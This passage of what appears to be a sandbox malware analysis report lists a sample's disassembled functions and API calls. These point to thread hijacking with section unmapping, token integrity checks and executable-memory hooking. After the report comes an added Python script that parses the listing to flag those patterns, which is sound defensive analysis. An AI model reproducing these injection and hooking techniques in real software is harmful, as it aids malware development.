  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
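Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser for the "APIs" bullets in the function blocks of this report, applied to three blocks copied from above (the thread suspend/resume block at 001DC240, the OpenProcessToken block at 01B33F6C and the GetModuleHandleA/VirtualProtect block at 001D79D6, the last shortened to its relevant calls). It groups each function's direct and sub-function calls, checks the third VirtualProtect argument for PAGE_EXECUTE_READWRITE, and flags API combinations an analyst would triage first. The bullet format assumed is the one printed in this report; the pattern labels are this example's reading of those combinations, not something the report itself states.

```python
import re

# One bullet of an "APIs" list in this report, e.g.
#   • memset.NTDLL ref: 001DC240
#   • ResumeThread.KERNEL32(?,?,00000004), ref: 001DC2CA
#   • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Za-z0-9]+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

def parse_api_lines(text):
    """Parse one function's "APIs" bullets into dicts with keys api, module,
    args (list of str as printed), ref (call-site address) and sub (address of
    the sub-function the call belongs to, None for a direct call)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings, blank lines, "Strings"/"Similarity" entries
        args = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": args.split(",") if args else [],
                      "ref": m.group("ref"), "sub": m.group("sub")})
    return calls

PAGE_EXECUTE_READWRITE = 0x40

def rwx_virtualprotect_sites(calls):
    """Call sites where VirtualProtect's 3rd argument (flNewProtect) is
    PAGE_EXECUTE_READWRITE; "?" means the sandbox could not resolve the value."""
    sites = []
    for c in calls:
        if c["api"] == "VirtualProtect" and len(c["args"]) >= 3:
            try:
                if int(c["args"][2], 16) == PAGE_EXECUTE_READWRITE:
                    sites.append(c["ref"])
            except ValueError:
                pass
    return sites

# API combinations (direct calls plus sub-calls) worth flagging. Labels are
# this example's reading of the combination, not the report's classification.
HOOK_LABEL = "module lookup followed by RWX VirtualProtect (inline hook or patch)"
PATTERNS = {
    "thread suspend/resume around NtUnmapViewOfSection (hollowing-style injection)":
        {"SuspendThread", "ResumeThread", "NtUnmapViewOfSection"},
    "token SID sub-authority read (integrity-level check)":
        {"OpenProcessToken", "GetSidSubAuthorityCount", "GetSidSubAuthority"},
    HOOK_LABEL: {"GetModuleHandleA", "VirtualProtect"},
}

def match_patterns(calls):
    """Labels of every pattern whose APIs all occur in the parsed block."""
    names = {c["api"] for c in calls}
    hits = [label for label, needed in PATTERNS.items() if needed <= names]
    # A VirtualProtect that only restores the old protection is not a hook.
    if HOOK_LABEL in hits and not rwx_virtualprotect_sites(calls):
        hits.remove(HOOK_LABEL)
    return hits

# "APIs" lists copied verbatim from the report blocks named in the lead-in,
# keyed by the first call-site address; the hook block is shortened.
SAMPLE_BLOCKS = {
    "001DC240": """\
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
""",
    "01B33F6C": """\
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
""",
    "001D79D6": """\
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
""",
}

def analyse(blocks=SAMPLE_BLOCKS):
    """Map each block name to the pattern labels matched by its API list."""
    return {name: match_patterns(parse_api_lines(text)) for name, text in blocks.items()}

if __name__ == "__main__":
    for name, hits in analyse().items():
        print(name, "->", hits or ["no pattern"])
```

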